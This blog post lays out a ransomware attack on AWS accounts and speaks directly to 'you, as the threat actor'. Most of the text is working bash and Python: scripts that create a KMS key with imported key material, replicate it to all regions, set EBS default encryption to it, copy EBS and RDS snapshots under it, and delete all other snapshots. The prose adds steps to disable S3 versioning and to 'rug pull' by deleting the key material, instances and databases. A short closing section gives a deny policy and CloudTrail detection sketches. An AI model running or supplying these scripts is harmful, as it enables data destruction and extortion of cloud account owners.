Effective Techniques for AWS Ransomware

To profit from a ransomware attack, a threat actor needs to have something to offer in return for payment. This blog post outlines a process, along with some bash and Python scripts, to encrypt AWS resources and then revoke access to the secret material until the ransom is paid.

Typical ransomware attacks on AWS have involved either deleting data with a “promise to give it back” or outright extortion: we’ll release sensitive data on the dark web if you don’t pay us. Both are difficult for a threat actor to do at scale with large AWS datasets. Downloading data means you need a storage location as big as the source.

But what if there was a way to conduct a more traditional encrypt-everything-and-hold-the-key ransom attack?

AWS provides an encryption service called KMS. One method that has not seen widespread adoption is to encrypt a victim’s data with a KMS key from an attacker or third-party compromised account. KMS keys are generally secure, and there are ways to make it difficult to decrypt the data. However, they rely on the core principles of IAM, and at the core of IAM is the root user. This user is as much a commercial and billing construct as it is a technical control. This means that if an attacker uses a KMS key from another account, I, as the victim, would have my attorney file an emergency order at a local court, demanding AWS turn over or reset the root credentials for the account that has the KMS key. At the end of the day, AWS is subject to the law[1], and I can recover my data by leveraging the law.

There are two other methods that neither AWS nor the legal system can prevent. The first is to use an external key store (XKS), as outlined here. This is generally complex and can have some scaling issues. It’s also harder to explain to the victim (who, let’s face it, screwed up Shared Responsibility to the point you encrypted their data). As the attacker, you’d have to put the external infra back online, potentially opening you up to detection.

The Attack

The other method is to leverage external key material. This is the attack path I will document for you today. I’ll even include some simple bash scripts, courtesy of ChatGPT (who had no idea I was building ransomware scripts with my innocent queries).

Step 1 is to create an empty KMS key and upload a random 256-bit key. This is what you, as the threat actor, will provide your victim upon payment. Next, we replicate that key to every AWS region because we want to be able to encrypt as many things as possible during our dwell time in the victim’s account.

#!/bin/bash

# Ensure that AWS CLI and OpenSSL are installed
if ! command -v aws &> /dev/null; then
    echo "AWS CLI is not installed. Please install it before running this script."
    exit 1
fi

if ! command -v openssl &> /dev/null; then
    echo "OpenSSL is not installed. Please install it before running this script."
    exit 1
fi

# Step 1: Create a KMS key that supports imported key material
KEY_METADATA=$(aws kms create-key --origin EXTERNAL --description "$KEY_DESCRIPTION" --output json)
KEY_ID=$(echo $KEY_METADATA | jq -r '.KeyMetadata.KeyId')

if [ -z "$KEY_ID" ]; then
    echo "Failed to create KMS key."
    exit 1
fi

KEY_MATERIAL_FILE="$KEY_ID.key"

# Step 2: Generate the key material
openssl rand -out "$KEY_MATERIAL_FILE" 32
if [ $? -ne 0 ]; then
    echo "Failed to generate key material."
    exit 1
fi

# Step 3: Get the import parameters for the key
IMPORT_PARAMS=$(aws kms get-parameters-for-import --key-id "$KEY_ID" --wrapping-algorithm RSAES_OAEP_SHA_1 --wrapping-key-spec RSA_2048 --output json)
WRAPPING_KEY=$(echo $IMPORT_PARAMS | jq -r '.ImportToken')
PUBLIC_KEY_B64=$(echo $IMPORT_PARAMS | jq -r '.PublicKey')

# Decode the public key and save it to a file
echo "$PUBLIC_KEY_B64" | base64 -d > public_key.pem

# Step 4: Encrypt the key material
openssl rsautl -encrypt -oaep -inkey public_key.pem -pubin -in "$KEY_MATERIAL_FILE" -out encrypted_key_material.bin
if [ $? -ne 0 ]; then
    echo "Failed to encrypt key material."
    exit 1
fi

# Step 5: Import the key material to KMS
EXPIRATION_MODEL="KEY_MATERIAL_DOES_NOT_EXPIRE"
IMPORT_TOKEN=$(echo $IMPORT_PARAMS | jq -r '.ImportToken')
aws kms import-key-material --key-id "$KEY_ID" --encrypted-key-material fileb://encrypted_key_material.bin --import-token "$IMPORT_TOKEN" --expiration-model "$EXPIRATION_MODEL"

if [ $? -ne 0 ]; then
    echo "Failed to import key material to KMS."
    exit 1
fi

# Cleanup
echo "Cleaning up..."
rm -f public_key.pem encrypted_key_material.bin

# Summary
echo "Successfully created KMS key with imported key material."
echo "Key ID: $KEY_ID"

Is 256 bits enough? Apparently so…

Replicate Key to all regions script:

#!/bin/bash

# Ensure that AWS CLI and jq are installed
if ! command -v aws &> /dev/null; then
    echo "AWS CLI is not installed. Please install it before running this script."
    exit 1
fi

if ! command -v jq &> /dev/null; then
    echo "jq is not installed. Please install it before running this script."
    exit 1
fi

# Check if a key ID was provided
if [ -z "$1" ]; then
    echo "Usage: $0 <key-id>"
    exit 1
fi

# Set variables
KEY_ID=$1

# Step 1: Get a list of all enabled regions
REGIONS=$(aws ec2 describe-regions --query "Regions[?OptInStatus!='not-opted-in'].RegionName" --output text)

# Step 2: Replicate the KMS key into each enabled region and import key material
for REGION in $REGIONS; do
    # Get the import parameters for the key in the target region
    IMPORT_PARAMS=$(aws kms get-parameters-for-import --key-id "$KEY_ID" --wrapping-algorithm RSAES_OAEP_SHA_1 --wrapping-key-spec RSA_4096 --region "$REGION" --output json)
    PUBLIC_KEY_B64=$(echo $IMPORT_PARAMS | jq -r '.PublicKey')
    IMPORT_TOKEN=$(echo $IMPORT_PARAMS | jq -r '.ImportToken')

    # Save the public key for the region
    echo "$PUBLIC_KEY_B64" | base64 -d > "${KEY_ID}-${REGION}.pem"

    # Encrypt the key material
    openssl rsautl -encrypt -oaep -inkey "${KEY_ID}-${REGION}.pem" -pubin -in "$KEY_ID.key" -out "${KEY_ID}-${REGION}.bin"

    # Import the key material into the region
    aws kms import-key-material --key-id "$KEY_ID" --region "$REGION" --encrypted-key-material fileb://"${KEY_ID}-${REGION}.bin" --import-token "$IMPORT_TOKEN" --expiration-model KEY_MATERIAL_DOES_NOT_EXPIRE
    echo "Replicating KMS key to region: $REGION"
    aws kms replicate-key --key-id "$KEY_ID" --replica-region "$REGION" --output json
    if [ $? -ne 0 ]; then
        echo "Failed to replicate KMS key to region: $REGION"
    else
        echo "Successfully replicated and imported key material for KMS key to region: $REGION"
    fi
done

# Summary
echo "KMS key replication process completed."

Step 2 is to start doing the encryption. There are several ways resources get encrypted in AWS, but EBS Volumes are a big one. AWS supports EBS default encryption, which we will now set using our ransom KMS key. Once this is done, all new volumes and snapshots are encrypted with the attacker-provided key material. You can do the same for any RDS Snapshots. Copy the snapshot and use the new ransom key. Make sure to delete the old snapshot or wait till the Rug Pull phase.

Enable Default EBS Encryption (in all regions)

#!/bin/bash

# Ensure that AWS CLI and jq are installed
if ! command -v aws &> /dev/null; then
    echo "AWS CLI is not installed. Please install it before running this script."
    exit 1
fi

if ! command -v jq &> /dev/null; then
    echo "jq is not installed. Please install it before running this script."
    exit 1
fi

# Check if a key ID was provided
if [ -z "$1" ]; then
    echo "Usage: $0 <multi-region-key-id>"
    exit 1
fi

# Set variables
KEY_ID=$1

# Step 1: Get a list of all enabled regions
REGIONS=$(aws ec2 describe-regions --query "Regions[?OptInStatus!='not-opted-in'].RegionName" --output text)

# Step 2: Enable EBS default encryption using the specified key in each enabled region
for REGION in $REGIONS; do
    echo "Enabling EBS default encryption in region: $REGION with key ID: $KEY_ID"
    aws ec2 enable-ebs-encryption-by-default --region "$REGION"
    if [ $? -ne 0 ]; then
        echo "Failed to enable EBS encryption by default in region: $REGION"
    else
        aws ec2 modify-ebs-default-kms-key-id --region "$REGION" --kms-key-id "$KEY_ID"
        if [ $? -ne 0 ]; then
            echo "Failed to set KMS key for EBS default encryption in region: $REGION"
        else
            echo "Successfully enabled EBS default encryption in region: $REGION with key ID: $KEY_ID"
        fi
    fi
done

# Summary
echo "EBS default encryption setup process completed."

Python script to copy and encrypt EBS Snapshots

#!/usr/bin/env python3

import boto3
import threading
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ensure that AWS CLI and boto3 are installed
def check_dependencies():
    try:
        import boto3
    except ImportError:
        print("boto3 is not installed. Please install it before running this script.")
        sys.exit(1)

check_dependencies()

# Check if a key ID was provided
if len(sys.argv) < 2:
    print("Usage: {} <multi-region-key-id>".format(sys.argv[0]))
    sys.exit(1)

# Set variables
KEY_ID = sys.argv[1]

ec2_clients = {}
def get_ec2_client(region):
    if region not in ec2_clients:
        ec2_clients[region] = boto3.client('ec2', region_name=region)
    return ec2_clients[region]

# Step 1: Get a list of all enabled regions
session = boto3.session.Session()
regions = [region['RegionName'] for region in session.client('ec2').describe_regions(Filters=[{'Name': 'opt-in-status', 'Values': ['opt-in-not-required', 'opted-in']}])['Regions']]

# Step 2: Function to create snapshot and encrypt it
def process_volume(region, volume_id):
    ec2 = get_ec2_client(region)
    try:
        # Create a snapshot of the volume
        print(f"Creating snapshot for volume: {volume_id} in region: {region}")
        snapshot = ec2.create_snapshot(VolumeId=volume_id, Description=f"Snapshot of {volume_id} encrypted with KMS key {KEY_ID}")
        snapshot_id = snapshot['SnapshotId']

        # Wait for the snapshot to complete
        print(f"Waiting for snapshot {snapshot_id} to complete in region: {region}")
        waiter = ec2.get_waiter('snapshot_completed')
        waiter.wait(SnapshotIds=[snapshot_id])

        # Copy the snapshot to encrypt it with the specified KMS key
        print(f"Encrypting snapshot: {snapshot_id} with KMS key: {KEY_ID} in region: {region}")
        encrypted_snapshot = ec2.copy_snapshot(
            SourceRegion=region,
            SourceSnapshotId=snapshot_id,
            Description=f"Encrypted copy of {volume_id}",
            Encrypted=True,
            KmsKeyId=KEY_ID
        )
        encrypted_snapshot_id = encrypted_snapshot['SnapshotId']

        # Wait for the encrypted snapshot to complete
        print(f"Waiting for encrypted snapshot {encrypted_snapshot_id} to complete in region: {region}")
        waiter.wait(SnapshotIds=[encrypted_snapshot_id])

        # Optionally delete the unencrypted snapshot
        print(f"Deleting unencrypted snapshot: {snapshot_id} in region: {region}")
        ec2.delete_snapshot(SnapshotId=snapshot_id)

        print(f"Successfully created and encrypted snapshot for volume: {volume_id} in region: {region}")
    except Exception as e:
        print(f"Failed to process volume {volume_id} in region {region}: {str(e)}")

# Step 3: Iterate over each region and create snapshots of the EBS volumes using threads
def process_region(region):
    ec2 = get_ec2_client(region)
    volumes = ec2.describe_volumes()['Volumes']
    if not volumes:
        print(f"No EBS volumes found in region: {region}")
        return

    futures = []
    with ThreadPoolExecutor(max_workers=5) as executor:
        for volume in volumes:
            volume_id = volume['VolumeId']
            futures.append(executor.submit(process_volume, region, volume_id))

        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {str(e)}")

# Step 4: Use threads to process each region
threads = []
for region in regions:
    thread = threading.Thread(target=process_region, args=(region,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

# Summary
print("EBS volume snapshot and encryption process completed.")

RDS Database encryption

#!/usr/bin/env python3

import boto3
import threading
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ensure that AWS CLI and boto3 are installed
def check_dependencies():
    try:
        import boto3
    except ImportError:
        print("boto3 is not installed. Please install it before running this script.")
        sys.exit(1)

check_dependencies()

# Check if a key ID was provided
if len(sys.argv) < 2:
    print("Usage: {} <multi-region-key-id>".format(sys.argv[0]))
    sys.exit(1)

# Set variables
KEY_ID = sys.argv[1]

rds_clients = {}
def get_rds_client(region):
    if region not in rds_clients:
        rds_clients[region] = boto3.client('rds', region_name=region)
    return rds_clients[region]

# Step 1: Get a list of all enabled regions
session = boto3.session.Session()
regions = [region['RegionName'] for region in session.client('ec2').describe_regions(Filters=[{'Name': 'opt-in-status', 'Values': ['opt-in-not-required', 'opted-in']}])['Regions']]

# Step 2: Function to take a snapshot of an RDS database and encrypt it
def create_encrypted_snapshot(region, db_instance_identifier):
    rds = get_rds_client(region)
    try:
        # Create a manual snapshot of the RDS instance
        snapshot_identifier = f"{db_instance_identifier}-snapshot"
        print(f"Creating snapshot for RDS instance: {db_instance_identifier} in region: {region}")
        snapshot = rds.create_db_snapshot(
            DBInstanceIdentifier=db_instance_identifier,
            DBSnapshotIdentifier=snapshot_identifier
        )
        snapshot_arn = snapshot['DBSnapshot']['DBSnapshotArn']

        # Wait for the snapshot to be available
        print(f"Waiting for snapshot {snapshot_identifier} to be available in region: {region}")
        waiter = rds.get_waiter('db_snapshot_completed')
        waiter.wait(DBSnapshotIdentifier=snapshot_identifier)

        # Copy the snapshot to encrypt it with the specified KMS key
        encrypted_snapshot_identifier = f"{db_instance_identifier}-encrypted-snapshot"
        print(f"Encrypting snapshot: {snapshot_identifier} with KMS key: {KEY_ID} in region: {region}")
        rds.copy_db_snapshot(
            SourceDBSnapshotIdentifier=snapshot_arn,
            TargetDBSnapshotIdentifier=encrypted_snapshot_identifier,
            KmsKeyId=KEY_ID,
            CopyTags=True,
            Tags=[
                {
                    'Key': 'source-database',
                    'Value': db_instance_identifier
                }
            ]
        )

        # Wait for the encrypted snapshot to be available
        print(f"Waiting for encrypted snapshot {encrypted_snapshot_identifier} to be available in region: {region}")
        waiter.wait(DBSnapshotIdentifier=encrypted_snapshot_identifier)

        # Optionally delete the unencrypted snapshot
        print(f"Deleting unencrypted snapshot: {snapshot_identifier} in region: {region}")
        rds.delete_db_snapshot(DBSnapshotIdentifier=snapshot_identifier)

        print(f"Successfully created and encrypted snapshot for RDS instance: {db_instance_identifier} in region: {region}")
    except Exception as e:
        print(f"Failed to process RDS instance {db_instance_identifier} in region {region}: {str(e)}")

# Step 3: Iterate over each region and create snapshots of the RDS databases using threads
def process_region(region):
    rds = get_rds_client(region)
    dbs = rds.describe_db_instances()['DBInstances']
    if not dbs:
        print(f"No RDS instances found in region: {region}")
        return

    futures = []
    with ThreadPoolExecutor(max_workers=5) as executor:
        for db in dbs:
            db_instance_identifier = db['DBInstanceIdentifier']
            futures.append(executor.submit(create_encrypted_snapshot, region, db_instance_identifier))

        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {str(e)}")

# Step 4: Use threads to process each region
threads = []
for region in regions:
    thread = threading.Thread(target=process_region, args=(region,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

# Summary
print("RDS snapshot creation and encryption process completed.")

Step 3 will take longer since it involves S3. You can create an AWS Batch job to re-encrypt all objects using a new key. There are a few considerations to be aware of. First, if the victim has object versioning enabled, they can recover their objects by restoring the previous version over yours. So you probably want to turn versioning off. Luckily for you (the attacker), the IAM action to enable and disable versioning is the same, so there is no way a defender can define a security invariant of “don’t let my users disable versioning” unless they also prevent their users from enabling versioning.
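From the defender's side, since the permission cannot be split, one option is to detect the change after the fact. The following is a minimal sketch, assuming the CloudTrail record for `PutBucketVersioning` carries the new state under `requestParameters.VersioningConfiguration.Status`. Verify that shape against your own trail; the function name is hypothetical.

```python
def is_versioning_suspended(event):
    """Return True if a CloudTrail record looks like S3 versioning being suspended.

    Assumption: the requested state appears at
    requestParameters.VersioningConfiguration.Status.
    """
    if event.get("eventSource") != "s3.amazonaws.com":
        return False
    if event.get("eventName") != "PutBucketVersioning":
        return False
    params = event.get("requestParameters") or {}
    config = params.get("VersioningConfiguration") or {}
    return config.get("Status") == "Suspended"


# Hand-written sample records for illustration, not real log data.
suspended = {
    "eventSource": "s3.amazonaws.com",
    "eventName": "PutBucketVersioning",
    "requestParameters": {
        "bucketName": "example-bucket",
        "VersioningConfiguration": {"Status": "Suspended"},
    },
}
enabled = {
    "eventSource": "s3.amazonaws.com",
    "eventName": "PutBucketVersioning",
    "requestParameters": {
        "bucketName": "example-bucket",
        "VersioningConfiguration": {"Status": "Enabled"},
    },
}
```

A predicate like this can sit behind whatever alerting pipeline already consumes CloudTrail, so that enabling versioning stays quiet while suspending it raises an alert.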

The final step is the Rug Pull. Delete the custom KMS key material, terminate all the running instances, delete any stray volumes, and delete the RDS databases. Your victim will have their data and will be able to recover, but only after they pay you for the 256 bits that only you now possess.

Delete all the snapshots that aren’t encrypted by the ransom KMS key

#!/usr/bin/env python3

import boto3
import threading
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ensure that AWS CLI and boto3 are installed
def check_dependencies():
    try:
        import boto3
    except ImportError:
        print("boto3 is not installed. Please install it before running this script.")
        sys.exit(1)

check_dependencies()

# Check if a key ID was provided
if len(sys.argv) < 2:
    print("Usage: {} <multi-region-key-id>".format(sys.argv[0]))
    sys.exit(1)

# Set variables
KEY_ID = sys.argv[1]

ec2_clients = {}
def get_ec2_client(region):
    if region not in ec2_clients:
        ec2_clients[region] = boto3.client('ec2', region_name=region)
    return ec2_clients[region]

# Step 1: Get a list of all enabled regions
session = boto3.session.Session()
regions = [region['RegionName'] for region in session.client('ec2').describe_regions(Filters=[{'Name': 'opt-in-status', 'Values': ['opt-in-not-required', 'opted-in']}])['Regions']]

# Step 2: Function to delete unencrypted snapshots
def delete_unencrypted_snapshot(region, snapshot_id):
    ec2 = get_ec2_client(region)
    try:
        print(f"Deleting snapshot: {snapshot_id} in region: {region}")
        ec2.delete_snapshot(SnapshotId=snapshot_id)
        print(f"Successfully deleted snapshot: {snapshot_id} in region: {region}")
    except Exception as e:
        print(f"Failed to delete snapshot {snapshot_id} in region {region}: {str(e)}")

# Step 3: Iterate over each region and find unencrypted snapshots
def process_region(region):
    ec2 = get_ec2_client(region)
    snapshots = ec2.describe_snapshots(OwnerIds=['self'])['Snapshots']
    if not snapshots:
        print(f"No snapshots found in region: {region}")
        return

    futures = []
    with ThreadPoolExecutor(max_workers=5) as executor:
        for snapshot in snapshots:
            snapshot_id = snapshot['SnapshotId']
            kms_key_id = snapshot.get('KmsKeyId')

            # Check if the snapshot is encrypted with the specified multi-region key
            if not kms_key_id or not kms_key_id.endswith(KEY_ID):
                print(f"Deleting snapshot {snapshot_id} encrypted with key {kms_key_id}")
                futures.append(executor.submit(delete_unencrypted_snapshot, region, snapshot_id))

        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {str(e)}")

# Step 4: Use threads to process each region
threads = []
for region in regions:
    thread = threading.Thread(target=process_region, args=(region,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

# Summary
print("Unencrypted snapshot deletion process completed.")

Recovery for the victim is straightforward. They take the base64-encoded 256-bit secret, re-upload it to the KMS key, and their data is accessible again. If they’re absolutely panicked, the AWS Customer Incident Response Team (CIRT) is a free resource that can help them recover. But… be wary; that team is probably also looking for you.

Can you prevent this?

Yes. Uploading KMS key material is its own AWS API call, which you can theoretically block via an SCP. A number of CloudTrail events are generated when this activity occurs, and you can create detections around those eventName/eventSource pairs.
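As a rough illustration of both ideas, here is a minimal sketch. It assumes your organization has no legitimate need for imported key material (otherwise the deny statement needs conditions or exceptions). The watch list is my own guess at the relevant eventSource/eventName pairs, based on the API calls used in the scripts above, and the function names are hypothetical.

```python
import json

# Assumed watch list: CloudTrail (eventSource, eventName) pairs matching the
# API calls used earlier in this post. Tune it for your environment.
WATCHED_EVENTS = {
    ("kms.amazonaws.com", "GetParametersForImport"),
    ("kms.amazonaws.com", "ImportKeyMaterial"),
    ("kms.amazonaws.com", "DeleteImportedKeyMaterial"),
    ("kms.amazonaws.com", "ReplicateKey"),
    ("ec2.amazonaws.com", "ModifyEbsDefaultKmsKeyId"),
}


def build_deny_import_scp():
    """Build an SCP document that denies importing or deleting KMS key material."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyImportedKeyMaterial",
                "Effect": "Deny",
                "Action": [
                    "kms:ImportKeyMaterial",
                    "kms:DeleteImportedKeyMaterial",
                ],
                "Resource": "*",
            }
        ],
    }


def is_watched_event(event):
    """Return True if a CloudTrail record matches one of the watched pairs."""
    return (event.get("eventSource"), event.get("eventName")) in WATCHED_EVENTS


if __name__ == "__main__":
    # Print the policy JSON so it can be reviewed before attaching it anywhere.
    print(json.dumps(build_deny_import_scp(), indent=2))
```

The SCP covers prevention in member accounts, while the event matcher is meant for accounts where imported key material has to stay allowed and you can only alert on it.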

I was going to gather all that data from the CloudTrail and my test account, but… I don’t feel like doing that anymore. So here’s my raw research.


  1. Now that the law is about to be controlled by a hypersensitive narcissist with immunity for all “official” actions, you should be seriously reevaluating your threat model of being in the cloud. Just ask CNN about that.